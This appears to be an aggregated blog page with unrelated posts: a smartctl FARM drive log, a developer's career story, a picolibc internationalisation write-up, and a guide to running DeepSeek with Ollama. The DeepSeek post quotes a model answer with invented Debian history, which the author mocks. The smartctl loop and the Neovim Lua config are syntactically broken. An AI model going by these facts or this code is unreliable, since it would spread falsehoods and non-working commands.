smartctl 7.4 2023-08-01 r5530 [x86_64-linux-6.1.0-30-amd64] (local build)
Copyright (C) 2002-23, Bruce Allen, Christian Franke, www.smartmontools.org

Seagate Field Access Reliability Metrics log (FARM) (GP Log 0xa6)
FARM Log Page 0: Log Header
FARM Log Version: 2.9
Pages Supported: 6
Log Size: 98304
Page Size: 16384
Heads Supported: 24
Number of Copies: 0
Reason for Frame Capture: 0
FARM Log Page 1: Drive Information
[..]
Power on Hours: 40860
Spindle Power on Hours: 34063
Head Flight Hours: 24513
Head Load Events: 72077
Power Cycle Count: 28
Hardware Reset Count: 193
You may like to run the command below on your systems to capture the state. Remember FARM is only supported on Seagate drives.
for i in /dev/sd a,b,c,d,e,f,g,h ; do smartctl -x $i ; smartctl -l farm $i ; >> $(date +'%y%m%d')_smartctl_$(basename $i).txt ; done

Divine Attah-Ohiemi: Seeking Opportunities: Building a Career in Software Engineering and Beyond

My journey in CS has always been driven by curiosity, determination, and a deep love for understanding software solutions at its tiniest, most complex levels. Taking ALX Africa Software Engineer track after High school was where it all started for me. During the 1-year intensive bootcamp, I delved into the intricacies of Linux programming and low-level programming with C, which solidified my foundational knowledge. This experience not only enhanced my technical skills but also taught me the importance of adaptability and self-directed learning. I discovered how to approach challenges with curiosity, igniting a passion for exploring software solutions in their most intricate forms. Each module pushed me to think critically and creatively, transforming my understanding of technology and its capabilities. Let s just say that I have always been drawn to asking, How does this happen?" And I just go on and on until I find an answer eventually and sometimes I don t but that s okay. That curiosity, combined with a deep commitment to learning, has guided my journey. Debian Webmaster My drive has led me to get involved in open-source contributions, where I can put my knowledge to the test while helping my community. Engaging with real-world experts and learning from my mistakes has been invaluable. One of the highlights of this journey was joining the Debian Webmasters team as an intern through Outreachy. Here, I have the honor of working on redesigning and migrating the old Debian webpages to make them more user-friendly. This experience not only allows me to apply my skills in a practical setting but also deepens my understanding of collaborative software development. Building My Skills: The Foundation of My Experience Throughout my academic and professional journey, I have taken on many roles that have shaped my skills and prepared me for what s ahead I believe. I am definitely not a one-trick pony, and maybe not completely a jack of all trade either but I am a bit diverse I d like to think. Here are the key roles that have defined my journey so far: Volunteer Developer at Yoris Africa (June 2022 - August 2023) I began my career by volunteering at Yoris, where I collaborated with a talented team to design and build the frontend for a mobile app. My contributions extended beyond just the frontend; I also worked on backend solutions and microservices, gaining hands-on experience in full-stack development. This role was instrumental in shaping my understanding of software architecture, allowing me to contribute meaningfully to projects while learning from experienced developers in a dynamic environment. Freelance Academics Software Developer (September 2023 - October 2024) I freelanced as an academic software developer, where I pitched and developed software solutions for universities in my community. One of my most notable projects was creating a Computer-Based Testing (CBT) software for a medical school, which featured a unique questionnaire and scoring system tailored to their specific needs. This experience not only allowed me to apply my technical skills in a real-world setting but also deepened my understanding of educational software requirements and user experience, ultimately enhancing the learning process for students. Open Source Intern at Debian Webmaster Team (November 2024 -) Perhaps the most transformative experience has been my role as an intern at Debian Webmasters. This opportunity allowed me to delve into the fascinating world of open source. As an intern, I have the chance to work on a project where we are redesigning and migrating the Debian webpages to utilize a new and faster technology: Go templates with Hugo. For a detailed look at the work and progress I made during my internship, as well as information on this project and how to get involved, you can check out the wiki. My ultimate goal with this role is to build a vibrant community for Debian in Africa and, if given the chance, to host a debian-cd mirror for faster installations in my region. You can connect with me through LinkedIn, or X (formerly Twitter), or reach out via email.

29 January 2025

Keith Packard: picolibc-i18n

Internationalization support in Picolibc There are two major internationalization APIs in the C library: locales and iconv. Iconv is an isolated component which only performs charset conversion in ways that don't interact with anything else in the library. Locales affect pretty much every API that deals with strings and covers charset conversion along with a huge range of localized information from character classification to formatting of time, money, people's names, addresses and even standard paper sizes. Picolibc inherits it's implementation of both of these from newlib. Given that embedded applications rarely need advanced functionality from either these APIs, I hadn't spent much time exploring this space. Newlib locale code When run on Cygwin, Newlib's locale support is quite complete as it leverages the underlying Windows locale support. Without Windows support, everything aside from charset conversion and character classification data is stubbed out at the bottom of the stack. Because the implementation can support full locale functionality, the implementation is designed for that, with large data structures and lots of code. Charset conversion and character classification data for locales is all built-in; none of that can be loaded at runtime. There is support for all of the ISO-8859 charsets, three JIS variants, a bunch of Windows code pages and a few other single-byte encodings. One oddity in this code is that when using a JIS locale, wide characters are stored in EUC-JP rather than Unicode. Every other locale uses Unicode. This means APIs like wctype are implemented by mapping the JIS-encoded character to Unicode and then using the underlying Unicode character classification tables. One consequence of this is that there isn't any Unicode to JIS mapping provided as it isn't necessary. When testing the charset conversion and Unicode character classification data, I found numerous minor errors and a couple of pretty significant ones. The JIS conversion code had the most serious issue I found; most of the conversions are in a 2d array which is manually indexed with the wrong value for the length of each row. This led to nearly every translated value being incorrect. The charset conversion tables and Unicode classification data are now generated using python charset support and the standard Unicode data files. In addition, tests have been added which compare Picolibc to the system C library for every supported charset. Newlib iconv code The iconv charset support is completely separate from the locale charset support with a much wider range of supported targets. It also supports loading charset data from files at runtime, which reduces the size of application images. Because the iconv and locale implementations are completely separate, the charset support isn't the same. Iconv supports a lot more charsets, but it doesn't support all of those available to locales. For example, Iconv has Big5 support which locale lacks. Conversely, locale has Shift-JIS support which iconv does not. There's also a difference in how charset names are mapped in the two APIs. The locale code has a small fixed set of aliases, which doesn't include things like US-ASCII or ANSI X3.4. In contrast, the iconv code has an extensive database of charset aliases which are compiled into the library. Picolibc has a few tests for the iconv API which verify charset names and perform some translations. Without an external reference, it's hard to know if the results are correct. POSIX vs C internationalization In addition to including the iconv API, POSIX extends locale support in a couple of ways:
  1. Exposing locale objects via the newlocale, uselocale, duplocale and freelocale APIs.
  2. uselocale sets a per-thread locale, rather than the process-wide locale.
Goals for Picolibc internationalization support For charsets, supporting UTF-8 should cover the bulk of embedded application needs, and even that is probably more than what most applications require. Most (all?) compilers use Unicode for wide character and string constants. That means wchar_t needs to be Unicode in every locale. Aside from charset support, the rest of the locale infrastructure is heavily focused on creating human-consumable strings. I don't think it's a stretch to say that none of this is very useful these days, even for systems with sophisticated user interactions. For picolibc, the cost to provide any of this would be high. Having two completely separate charset conversion datasets makes for a confusing and error-prone experience for developers. Replacing iconv with code that leverages the existing locale support for translating between multi-byte and wide-character representations will save a bunch of source code and improve consistency. Embedded systems can be very sensitive to memory usage, both read-only and read-write. Applications not using internationalization capabilities shouldn't pay a heavy premium even when the library binary is built with support. For the most sensitive targets, the library should be configurable to remove unnecessary functionality. Picolibc needs to be conforming with at least the C language standard, and as much of POSIX as makes sense. Fortunately, the requirements for C are modest as it only includes a few locale-related APIs and doesn't include iconv. Finally, picolibc should test these APIs to make sure they conform with relevant standards, especially character set translation and character classification. The easiest way to do this is to reference another implementation of the same API and compare results. Switching to Unicode for JIS wchar_t This involved ripping the JIS to Unicode translations out of all of the wide character APIs and inserting them into the translations between multi-byte and wide-char representations. The missing Unicode to JIS translation was kludged by iterating over all JIS code points until a matching Unicode value was found. That's an obvious place for a performance improvement, but at least it works. Tiny locale This is a minimal implementation of locales which conforms with the C language standard while providing only charset translation and character classification data. It handles all of the existing charsets, but splits things into three levels
  1. ASCII
  2. UTF-8
  3. Extended, including any or all of: a. ISO 8859 b. Windows code pages and other 8-bit encodings c. JIS (JIS, EUC-JP and Shift-JIS)
When built for ASCII-only, all of the locale support is short-circuited, except for error checking. In addition, support in printf and scanf for wide characters is removed by default (it can be re-enabled with the -Dio-wchar=true meson option). This offers the smallest code size. Because the wctype APIs (e.g. iswupper) are all locale-specific, this mode restricts them to ASCII-only, which means they become wrappers on top of the ctype APIs with added range checking. When built for UTF-8, character classification for wide characters uses tables that provide the full Unicode range. Setlocale now selects between two locales, "C" and "C.UTF-8". Any locale name other than "C" selects the UTF-8 version. If the locale name contains "." or "-", then the rest of the locale name is taken to be a charset name and matched against the list of supported charsets. In this mode, only "us_ascii", "ascii" and "utf-8" are recognized. Because a single byte of a utf-8 string with the high-bit set is not a complete character, all of the ctype APIs in this mode can use the same implementation as the ASCII-only mode. This means the small ctype implementation is available. Calling setlocale(LC_ALL, "C.UTF-8") will allow the application to use the APIs which translate between multi-byte and wide-characters to deal with UTF-8 encoded strings. In addition, scanf and printf can read and write UTF-8 strings into wchar_t strings. Locale names are converted into locale IDs, an enumeration which lists the available locales. Each ID implies a specific charset as that's the only thing which differs between them. This means a locale can be encoded in a few bytes rather than an array of strings. In terms of memory usage, applications not using locales and not using the wctype APIs should see only a small increase in code space. That's due to the wchar_t support added to printf and scanf which need to translate between multi-byte and wide-character representations. There aren't any tables required as ASCII and UTF-8 are directly convertible to Unicode. On ARM-v7m, The added code in printf and scanf add up to about 1kB and another 32 bytes of RAM is used. The big difference when enabling extended charset support is that all of the charset conversion and character classification operations become table driven and dependent on the locale. Depending on the extended charsets supported, these can be quite large. With all of the extended charsets included, this adds an additional 30kB of code and static data and uses another 56 bytes of RAM. There are two known gaps in functionality compared with the newlib code:
  1. Locale strings that encode different locales for different categories. That's nominally required by POSIX as LC_ALL is supposed to return a string sufficient to restore the locale, but the only category which actually matters is LC_CTYPE.
  2. No nl_langinfo support. This would be fairly easy to add, returning appropriate constant values for each parameter.
Tiny locale was merged to picolibc main in this PR Tiny iconv Replacing the bulky newlib iconv code was far easier than swapping locale implementations. Essentially all that iconv does is compute two functions, one which maps from multi-byte to wide-char in one locale and another which maps from wide-char to multi-byte in another locale. Once the JIS locales were fixed to use Unicode, the new iconv implementation was straightforward. POSIX doesn't provide any _l version of mbrtowc or wcrtomb, so using standard C APIs would have been clunky. Instead, the implementation uses the internal APIs to compute the correct charset conversion functions. The entire implementation fits in under 200 lines of code. Tiny iconv is in process in this PR Future directions Right now, both of these new bits of code sit in the source tree parallel to the old versions. I'm not seeing any particular reason to keep the old versions around; they have provided a useful point of comparison in developing the new code, but I don't think they offer any compelling benefits going forward.

Sergio Talens-Oliag: Testing DeepSeek with Ollama and Open WebUI

With all the recent buzz about DeepSeek and its capabilities, I ve decided to give it a try using Ollama and Open WebUI on my work laptop which has an NVIDIA GPU:
$ lspci   grep NVIDIA
0000:01:00.0 3D controller: NVIDIA Corporation GA107GLM [RTX A2000 8GB Laptop GPU]
             (rev a1)
For the installation I initially I looked into the approach suggested on this article, but after reviewing it I decided to go for a docker only approach, as it leaves my system clean and updates are easier.

Step 0: Install dockerI already had it on my machine, so nothing to do here.

Step 1: Install the nvidia-container-toolkit packageAs it is needed to use the NVIDIA GPU with docker I followed the instructions to install the package using apt from the NVIDIA website.

Step 2: Run the Open WebUI container bundled with OllamaI could install ollama directly on linux or run it on docker, but I found out that there is a container with Open WebUI bundled with Ollama, so I decided to use it instead. To start the container I ve executed the following command:
docker run -d \
  -e OLLAMA_HOST="0.0.0.0:11434" -p 127.0.0.1:11434:11434 \
  -p 127.0.0.1:3000:8080 \
  -v ollama:/root/.ollama \
  -v open-webui:/app/backend/data \
  --gpus=all --name open-webui --restart always \
  ghcr.io/open-webui/open-webui:ollama
Once the container is up and running, I can access the Open WebUI on http://localhost:3000/ and the Ollama API on http://localhost:11434/ (I added the OLLAMA_HOST environment variable to be bind the server to all the container IPs, as it is needed to export it to the host).

Step 3: Install DeepSeek-R1 model from Open WebUIAfter creating an admin user on the Open WebUI, I went to the select a model button and asked to download the deepseek-r1 model (at the time of writing this it matches version deepseek-r1:7b, which uses 4.7GB of space). After the download was completed I was able to start chatting with the model on my local machine.

Step 4: Ask a questionThe first question I asked was Can you tell me what is Debian? and the answer I got was:
Debian is one of the most popular Linux distributions used worldwide. It is an
open-source operating system that has been around since 1993 and is known for
its stability, security, and reliability. Debian is widely used in servers, data
centers, and enterprise environments because it provides a robust base platform
with excellent documentation, tools, and community support.
### Key Features of Debian:

1. **History**:
   - Debian started as a project called "Pop!!" (Pootle) led by Lars Knutsen, a
     developer from Denmark.
   - It was initially forked from the Linux distribution Red Hat's RH-Debian to
     gain independence and reduce reliance on Red Hat.

2. **Use Cases**:
   - Debian is commonly used as an operating system for servers due to its
     reliability and ease of use in enterprise environments.
   - It is also used for individual user machines (laptops, desktops) because it
     offers a smooth and stable experience.
   - Debian provides the foundation for many popular derivatives like Ubuntu,
     which are designed for consumer use.

3. **Supported Architectures**:
   - Debian supports all major Linux architectures, including 32-bit and 64-bit
     systems, and runs on a wide range of hardware from old servers to modern
     smartphones.

4. **Package Management**:
   - Debian comes with a robust package management system called **Debian Policy
     Language (DPL)**, which allows users to easily install, update, and manage
     software packages.
   - This makes it easy for users to keep their systems up to date without
     needing to download multiple repositories or deal with version conflicts.

5. **Security Focus**:
   - Debian is known for its strong security practices. It has a reputation for
     being one of the most stable Linux distributions, making it a favorite
     among organizations that prioritize security.
   - The distribution regularly updates its software packages to patch
     vulnerabilities and protect against common attacks.

6. **Compatibility with Servers**:
   - Debian is widely used in data centers because it provides a consistent and
     reliable environment for running servers and applications.
   - Many open-source projects are compatible with Debian, making it an ideal
     choice for developers who want to work on servers or distributed systems.

7. **Popularity**:
   - Debian has a large and active community of users and contributors.
   - It is one of the most widely used Linux distributions in the world, with
     many enterprise organizations relying on it as their primary operating
     system.
### Comparison with Other Distributions:
- **Ubuntu**: Ubuntu is based on Debian but adds graphical user interfaces (like
  Gutsy Gibbon), modern tools (like GIMP and LibreOffice), and integrates with
  Microsoft services.
- **RHEL (Red Hat Enterprise Linux)**: RHEL is a derivative of Red Hat's
  distribution, which forked from Debian. It focuses more heavily on enterprise
  security and support compared to Debian.
### Why Debian?
Debian is popular because:
- It is free and open-source, making it accessible to anyone.
- It provides excellent documentation and tools for system administrators.
- It has a strong focus on stability and reliability.
- It supports a wide range of hardware and software needs.
If you're looking for a reliable and flexible Linux distribution that works well
in both personal and enterprise environments, Debian is an excellent choice.
Haven t tried the same question with ChatGPT, but the History, Package Management and Comparison with Other Distributions sections are hilarious, but they provided me with important data:
  • Now I know that APT is the real Debian Project Leader, what don t know is why we have elections each year ;)
  • Linux Distributions are recursive Debian was a fork of Red Hat, which was a fork of Debian, which was a fork of Red Hat,
As everybody is testing the model I will not talk more about the chat and the results, I just thought that this answer was really funny.

Step 5: Install the DeepSeek Coder and DeepSeek Coder v2 models from Open WebUIAs done before, to download the models I went to the select a model button and asked to download the deepseek-coder and deepseek-coder-v2 models (the default version of version one is said to be really quick and small, while version two is supposed to be better but slower and bigger, so I decided to install both for testing).

Step 6: Integrate Ollama with NeovimSince some months ago I ve been using Github Copilot with Neovim; I don t feel it has been very helpful in the general case, but I wanted to try it and it comes handy when you need to perform repetitive tasks when programming. It seems that there are multiple neovim plugins that support ollama, for now I ve installed and configured the codecompanion plugin on my config.lua file using packer:
require('packer').startup(function()
  [...]
  -- Codecompanion plugin
  use  
    "olimorris/codecompanion.nvim",
    requires =  
      "nvim-lua/plenary.nvim",
      "nvim-treesitter/nvim-treesitter",
     
   
  [...]
end)
[...]
-- --------------------------------
-- BEG: Codecompanion configuration
-- --------------------------------
-- Module setup
local codecompanion = require('codecompanion').setup( 
  adapters =  
    ollama = function()
      return require('codecompanion.adapters').extend('ollama',  
        schema =  
          model =  
            default = 'deepseek-coder-v2:latest',
           
         ,
       )
    end,
   ,
  strategies =  
    chat =   adapter = 'ollama',  ,
    inline =   adapter = 'ollama',  ,
   ,
 )
-- --------------------------------
-- END: Codecompanion configuration
-- --------------------------------
I ve tested it a little bit and it seems to work fine, but I ll have to test it more to see if it is really useful, I ll try to do it on future projects.

ConclusionAt a personal level I don t like nor trust AI systems, but as long as they are treated as tools and not as a magical thing you must trust they have their uses and I m happy to see that open source tools like Ollama and models like DeepSeek available for everyone to use.

Next.

Previous.